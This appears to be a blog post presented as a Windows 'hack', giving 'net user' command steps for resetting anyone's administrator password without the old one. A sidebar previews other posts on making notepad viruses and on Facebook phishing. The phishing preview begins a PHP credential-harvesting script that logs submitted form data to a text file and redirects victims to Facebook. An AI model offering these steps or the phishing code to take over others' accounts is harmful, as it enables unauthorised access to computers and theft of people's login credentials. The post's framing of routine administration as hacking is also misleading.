Skip to main content

hacking windows administration password


Changing Administrator Password using Command Prompt(CMD)

After reading this post, you’ll be able to change your and anyone’s Administrator account password in windows OS(7,XP AND OLDER VERSION)  without asking him the previous one. Usually, for changing the passwords, we go to User Accounts in Control Panel and then option for changing the passwords. But windows doesn’t permit us to do so, till we enter the previous password.
So, it’s clear that we can’t change the password from this method. Because, the current password is also required here, which we don’t know.
But, the same thing can become possible, if perform the same task through Windows Command Prompt(CMD). In this method, we are not prompted to enter the current/old password. But for that, we first need to be logged in as an Administrator(see step 2 below), unless you will be shown an error message. So, I don’t want you to get any type of error, that’s why I was focussing on this point. This hacking technique is very easy, you are only required to perform all steps, in the exact manner. If you still get any problem, then you can drop your comments below this article. The steps are as follows :-
Step-1 :- Press start button, and search CMD(windows command prompt).

Step-2 :- Now, do right click on CMD and select RUN AS ADMINISTRATOR(it’s the most important step of this hack, anotherwise an error will be shown in the end and then click OK. Most of the users don’t read the whole sentence and press Enter right after searching CMD in this step. Those users get an error named “System 5 Error”. So, please don’t press Enter directly on CMD.
This hacking technique is works only when you’re logged in to the Administrator(or administrator like) account. This hacking technique need Administrator(or administrator like) priviledges, unless it shows an Error. This hacking technique is thus NOT POSSIBLE if you are logged in with the GUEST ACCOUNT. If you want to crack the admin password without been logged in, then also, there’re lot of ways of doing that. But I have not yet posted about them. If you are eager to know about those steps, then wait till I post on that topic or mail me at trickntools@gmail.com

Step-3 :- Now type the command NET USER


and  press ENTER It will give u the names of all the USER A/C’s existing in your computer.

Step-4 :- Here, in this pic, you are getting three names, which are Administrator,RaHa and Guest. We are not at all interested in the Guest account for sure. So leave that. Now the two accounts are left. One is Administrator and the other is RaHa. Here, the both the accounts are having admin priviledges. In most of the cases the main admin account, which is ‘ADMINISTRATOR’ here, is hidden. And the other account, named ‘RaHa’ here, is shown, which is a ADMIN-LIKE account. So, this account also have full admin priviledges. Because only one admin account which is visible here is ‘RaHa’, so we will deal with this account in this process.
So, now use our next command, which is net user RaHa *
Here, there’s ONE SPACE between NET and USER as well as between RaHa and *


Step-5 :- Here u are, now directly enter the new ADMINISTRATOR PASSWORD and press enter again confirm ur new password and press enter. You will not see any ************* type of characters in the CMD window when you will be typing your password. But you don’t worry. They are not visible but they got typed. Re-type the same password in Confirm Password option.

Step-6 : U are done. Just type EXIT and then press ENTER to exit. That’s all...........

If you don’t encounter any problems and find my post great, then please don’t forget to appreciate it. You can also share my post.

Comments

  1. good bro keep it up. thise is Giridhar Mishra

    ReplyDelete

Post a Comment

Popular posts from this blog

How to hack anyone System in seconds and Create viruses

G et some knowledge about virus... What is Virus ?  A computer virus is a program or piece of code that is loaded onto your computer without your knowledge and runs against your wishes. All computer viruses are man-made. A simple virus that can make a copy of itself over and over again is relatively easy to produce. Even such a simple virus is dangerous because it will quickly use all available memory and bring the system to a halt. An even more dangerous type of virus is one capable of transmitting itself across networks and bypassing security systems   Create Virus on Notepad : It is very easy to create a virus on notepad   H ow to open notepad follow these steps 1. P ush win + R then new window will open then type notepad and click on OK . After that notepad will open then type or paste these command and make a virus.   1 -> Virus Creation Tricks 1 Just open the Notepad and type the paste the following Code. set ws=createobje...

Check Your Mother Board Model Number ,Serial Number, Version, And Many More.

How to Check Your Motherboard Model Number on Your Windows PC Whether you need to update drivers, want to check hardware compatibility, or you’re just curious , it’s way easier to check your motherboard model number with these simple tricks than it is to crack open your computer case to check the board itself . Read on as we show you how to check your motherboard model number from the comfort of your keyboard. Why Do I Want To Do This? There are a variety of situations where knowing your motherboard’s model number is important: upgrading your drivers, buying new hardware (you’ll need the proper expansion slots for card-based upgrades and the right memory DIMMS for memory upgrades, etc.), and checking the capabilities of your board if you’re considering upgrading the entire thing.  First Way (SIMPLEST WAY):- In this way there is only two step :- Step 1:- Go to Run(By Pressing Win+R) . Step 2:- Type dxdiag in Run and hit enter . ...

How to hack anyone facebook account with easiest way.

Hack Facebook Account with Easiest Way. T oday I am going to discuss some methods that can be used to hack a Facebook account password   Today I will cover only way to Hack Facebook Account Password that all hackers usually use to hack your Facebook account . 1 . F acebook P hishing Attack(Today's topic) . 2 . Hacking Facebook account password remotely using K eyloggers. 3 . S ocial Engineering or simply Guessing your friends Password.                                Facebook Phishing You need these three Files : 1.phishing.php 2.password.txt 3.facebook.html 1. Phishing.php File :-   **   Open Notepad and paste the Following code in notepad. header ('Location: https://www.facebook.com/login.php?login_attempt=1 '); $handle = fopen("password.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, ...